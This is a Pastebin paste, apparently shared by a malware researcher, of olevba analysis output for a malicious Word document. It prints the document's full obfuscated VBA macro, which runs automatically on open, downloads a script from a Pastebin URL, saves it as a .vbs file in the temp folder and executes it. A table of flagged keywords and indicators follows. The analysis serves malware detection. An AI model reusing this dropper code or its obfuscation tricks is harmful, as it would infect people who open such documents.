dynamoo

Malicious Word macro

Aug 4th, 2015
309
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. MHT:MASI---V malware.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: malware.doc
  10. Type: MHTML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: None - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub BHJvsafccc()
  16. zzzzzccsdc
  17. End Sub
  18. Sub AutoOpen()
  19.     BHJvsafccc
  20. End Sub
  21. Sub Workbook_Open()
  22.     BHJvsafccc
  23. End Sub
  24. -------------------------------------------------------------------------------
  25. VBA MACRO nxc.bas
  26. in file: None - OLE stream: u'VBA/nxc'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28. Sub zzzzzccsdc()
  29. Dim bpXIphzr, ttRrcQMW, ONsvPyQD As String
  30. bpXIphzr = "           MQPPSA               "
  31. ttRrcQMW = LTrim(bpXIphzr)
  32. ONsvPyQD = RTrim(ttRrcQMW)
  33.  
  34. mkHJBcsdf = "TEMP"
  35. Dim KllIoMIA, mRUZKkkX, OmDyVeER As String
  36. KllIoMIA = "           LEFDRN               "
  37. mRUZKkkX = LTrim(KllIoMIA)
  38. OmDyVeER = RTrim(mRUZKkkX)
  39.  
  40. nBJaddff = "MSXML2.XMLHTTP"
  41. Dim gqwqjvQx, njifLsFU, vzQNJfmu As String
  42. gqwqjvQx = "           TJBGXF               "
  43. njifLsFU = LTrim(gqwqjvQx)
  44. vzQNJfmu = RTrim(njifLsFU)
  45.  
  46. Set pIHJIasdf = CreateObject(nBJaddff)
  47. Dim RFsQJoJK, bFwCsdgL, wGYoYkSM As String
  48. RFsQJoJK = "           WIICDV               "
  49. bFwCsdgL = LTrim(RFsQJoJK)
  50. wGYoYkSM = RTrim(bFwCsdgL)
  51.  
  52. pKKhbsac = "ttp"
  53. Dim IIeoErOJ, fEPEHbnO, uMAgYYHd As String
  54. IIeoErOJ = "           YIJTPD               "
  55. fEPEHbnO = LTrim(IIeoErOJ)
  56. uMAgYYHd = RTrim(fEPEHbnO)
  57.  
  58. yDTYuadf = "://pas"
  59. Dim lKcgemiT, UIELoylf, XvOxgJTX As String
  60. lKcgemiT = "           BTSWSM               "
  61. UIELoylf = LTrim(lKcgemiT)
  62. XvOxgJTX = RTrim(UIELoylf)
  63.  
  64. ihuHJJdsf = StrReverse(ChrW$(111) & ChrW$(99) & ChrW$(46) & ChrW$(110) & ChrW$(105) & ChrW$(98))
  65. Dim JlMkGXlV, enYmjOwo, aqpigQzU As String
  66. JlMkGXlV = "           MWQKIN               "
  67. enYmjOwo = LTrim(JlMkGXlV)
  68. aqpigQzU = RTrim(enYmjOwo)
  69.  
  70. YGHvvdf = StrReverse(ChrW$(61) & ChrW$(105) & ChrW$(63) & ChrW$(112) & ChrW$(104) & ChrW$(112) & ChrW$(46) & ChrW$(100) & ChrW$(97) & ChrW$(111) & ChrW$(108) & ChrW$(110))
  71. Dim czsPxhrZ, lexXJlAR, grYisvBT As String
  72. czsPxhrZ = "           KGICEA               "
  73. lexXJlAR = LTrim(czsPxhrZ)
  74. grYisvBT = RTrim(lexXJlAR)
  75.  
  76. mmmkMKNd = StrReverse(ChrW$(104)) + pKKhbsac + yDTYuadf + StrReverse(ChrW$(101) & ChrW$(116)) + ihuHJJdsf + StrReverse(ChrW$(119) & ChrW$(111) & ChrW$(100) & ChrW$(47) & ChrW$(109)) + YGHvvdf
  77. Dim jsfkixUg, XuWDmKby, nzEiIdjV As String
  78. jsfkixUg = "           HSKAQR               "
  79. XuWDmKby = LTrim(jsfkixUg)
  80. nzEiIdjV = RTrim(XuWDmKby)
  81.  
  82. VHVisdfw = mmmkMKNd + StrReverse(ChrW$(51) & ChrW$(75) & ChrW$(84) & ChrW$(53) & ChrW$(100) & ChrW$(89) & ChrW$(114) & ChrW$(48))
  83. Dim eyzBsPgn, kXiZkwno, MuwxaLpZ As String
  84. eyzBsPgn = "           KSADHZ               "
  85. kXiZkwno = LTrim(eyzBsPgn)
  86. MuwxaLpZ = RTrim(kXiZkwno)
  87.  
  88. Call pIHJIasdf.Open(StrReverse(ChrW$(84) & ChrW$(83) & ChrW$(79) & ChrW$(80)), VHVisdfw, False)
  89. Dim KDNLtWtz, tLSXYOod, jBvBocsc As String
  90. KDNLtWtz = "           MTFYHN               "
  91. tLSXYOod = LTrim(KDNLtWtz)
  92. jBvBocsc = RTrim(tLSXYOod)
  93.  
  94. pIHJIasdf.Send
  95. Dim npjkobMZ, xqnREEkR, kqQHVIGT As String
  96. npjkobMZ = "           MLQFXY               "
  97. xqnREEkR = LTrim(npjkobMZ)
  98. kqQHVIGT = RTrim(xqnREEkR)
  99.  
  100. dyEYTasd = StrReverse(ChrW$(116) & ChrW$(99) & ChrW$(101) & ChrW$(106) & ChrW$(98) & ChrW$(79) & ChrW$(109) & ChrW$(101) & ChrW$(116) & ChrW$(115) & ChrW$(121) & ChrW$(83) & ChrW$(101) & ChrW$(108) & ChrW$(105) & ChrW$(70) & ChrW$(46) & ChrW$(103) & ChrW$(110) & ChrW$(105) & ChrW$(116) & ChrW$(112) & ChrW$(105) & ChrW$(114) & ChrW$(99) & ChrW$(83))
  101. Dim xeQAcRYS, aVlXPBcR, MgpUAyDi As String
  102. xeQAcRYS = "           NKOFUN               "
  103. aVlXPBcR = LTrim(xeQAcRYS)
  104. MgpUAyDi = RTrim(aVlXPBcR)
  105.  
  106. Set nJHOsdff = CreateObject(dyEYTasd)
  107. Dim aLlTJBDR, EtIbnxxB, KMFeTiIU As String
  108. aLlTJBDR = "           HTPEYP               "
  109. EtIbnxxB = LTrim(aLlTJBDR)
  110. KMFeTiIU = RTrim(EtIbnxxB)
  111.  
  112.    yyYHJKsdfv = Environ(mkHJBcsdf) & StrReverse(ChrW$(115) & ChrW$(98) & ChrW$(118) & ChrW$(46) & ChrW$(115) & ChrW$(99) & ChrW$(99) & ChrW$(72) & ChrW$(66) & ChrW$(106) & ChrW$(110) & ChrW$(110) & ChrW$(92))
  113. Dim TGZPOwhL, JWgDsplr, eaaHDCwf As String
  114. TGZPOwhL = "           FYZAYD               "
  115. JWgDsplr = LTrim(TGZPOwhL)
  116. eaaHDCwf = RTrim(JWgDsplr)
  117.  
  118. Set casasddd = nJHOsdff.CreateTextFile(yyYHJKsdfv, 2)
  119. Dim jJUevPkl, sKKhLGGl, iLzAfLdw As String
  120. jJUevPkl = "           GPLURS               "
  121. sKKhLGGl = LTrim(jJUevPkl)
  122. iLzAfLdw = RTrim(sKKhLGGl)
  123.  
  124. casasddd.Write pIHJIasdf.responseText
  125. Dim HjjttiWj, msBbkESo, NuYMRVRa As String
  126. HjjttiWj = "           EFMMOX               "
  127. msBbkESo = LTrim(HjjttiWj)
  128. NuYMRVRa = RTrim(msBbkESo)
  129.  
  130. casasddd.Close
  131. Dim XNaeMehp, vshCEnBR, DzwnIsqd As String
  132. XNaeMehp = "           WLTCXT               "
  133. vshCEnBR = LTrim(XNaeMehp)
  134. DzwnIsqd = RTrim(vshCEnBR)
  135.  
  136. yytTcbcn = StrReverse(ChrW$(110) & ChrW$(111) & ChrW$(105) & ChrW$(116) & ChrW$(97) & ChrW$(99) & ChrW$(105) & ChrW$(108) & ChrW$(112) & ChrW$(112) & ChrW$(65) & ChrW$(46) & ChrW$(108) & ChrW$(108) & ChrW$(101) & ChrW$(104) & ChrW$(83))
  137. Dim HzSBMocU, zivzwCnK, ffqtVPRe As String
  138. HzSBMocU = "           LSUOQY               "
  139. zivzwCnK = LTrim(HzSBMocU)
  140. ffqtVPRe = RTrim(zivzwCnK)
  141.  
  142. Set chgdTYasd = CreateObject(yytTcbcn)
  143. chgdTYasd.Open Environ(mkHJBcsdf) & StrReverse(ChrW$(115) & ChrW$(98) & ChrW$(118) & ChrW$(46) & ChrW$(115) & ChrW$(99) & ChrW$(99) & ChrW$(72) & ChrW$(66) & ChrW$(106) & ChrW$(110) & ChrW$(110) & ChrW$(92))
  144. End Sub
  145.  
  146.  
  147. -------------------------------------------------------------------------------
  148. VBA MACRO Class1.cls
  149. in file: None - OLE stream: u'VBA/Class1'
  150. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  151. (empty macro)
  152. -------------------------------------------------------------------------------
  153. VBA MACRO Class2.cls
  154. in file: None - OLE stream: u'VBA/Class2'
  155. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  156. (empty macro)
  157. -------------------------------------------------------------------------------
  158. VBA MACRO Class3.cls
  159. in file: None - OLE stream: u'VBA/Class3'
  160. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  161. (empty macro)
  162. -------------------------------------------------------------------------------
  163. VBA MACRO Class4.cls
  164. in file: None - OLE stream: u'VBA/Class4'
  165. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  166. (empty macro)
  167. -------------------------------------------------------------------------------
  168. VBA MACRO Class5.cls
  169. in file: None - OLE stream: u'VBA/Class5'
  170. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  171. (empty macro)
  172. -------------------------------------------------------------------------------
  173. VBA MACRO Class6.cls
  174. in file: None - OLE stream: u'VBA/Class6'
  175. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  176. (empty macro)
  177. -------------------------------------------------------------------------------
  178. VBA MACRO Class7.cls
  179. in file: None - OLE stream: u'VBA/Class7'
  180. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  181. (empty macro)
  182. -------------------------------------------------------------------------------
  183. VBA MACRO Class8.cls
  184. in file: None - OLE stream: u'VBA/Class8'
  185. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  186. (empty macro)
  187. -------------------------------------------------------------------------------
  188. VBA MACRO Class9.cls
  189. in file: None - OLE stream: u'VBA/Class9'
  190. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  191. (empty macro)
  192. -------------------------------------------------------------------------------
  193. VBA MACRO Class10.cls
  194. in file: None - OLE stream: u'VBA/Class10'
  195. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  196. (empty macro)
  197. -------------------------------------------------------------------------------
  198. VBA MACRO Class11.cls
  199. in file: None - OLE stream: u'VBA/Class11'
  200. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  201. (empty macro)
  202. +------------+----------------------+-----------------------------------------+
  203. | Type       | Keyword              | Description                             |
  204. +------------+----------------------+-----------------------------------------+
  205. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  206. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  207. | Suspicious | Open                 | May open a file                         |
  208. | Suspicious | CreateObject         | May create an OLE object                |
  209. | Suspicious | ChrW                 | May attempt to obfuscate specific       |
  210. |            |                      | strings                                 |
  211. | Suspicious | StrReverse           | May attempt to obfuscate specific       |
  212. |            |                      | strings                                 |
  213. | Suspicious | CreateTextFile       | May create a text file                  |
  214. | Suspicious | Environ              | May read system environment variables   |
  215. | Suspicious | Write                | May write to a file (if combined with   |
  216. |            |                      | Open)                                   |
  217. | Suspicious | Msxml2.XMLHTTP       | May download files from the Internet    |
  218. | Suspicious | Shell                | May run an executable file or a system  |
  219. |            |                      | command (obfuscation: VBA expression)   |
  220. | Suspicious | Shell.Application    | May run an application (if combined     |
  221. |            |                      | with CreateObject) (obfuscation: VBA    |
  222. |            |                      | expression)                             |
  223. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  224. |            | Strings              | may be used to obfuscate strings        |
  225. |            |                      | (option --decode to see all)            |
  226. | IOC        | nnjBHccs.vbs         | Executable file name (obfuscation: VBA  |
  227. |            |                      | expression)                             |
  228. +------------+----------------------+-----------------------------------------+
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×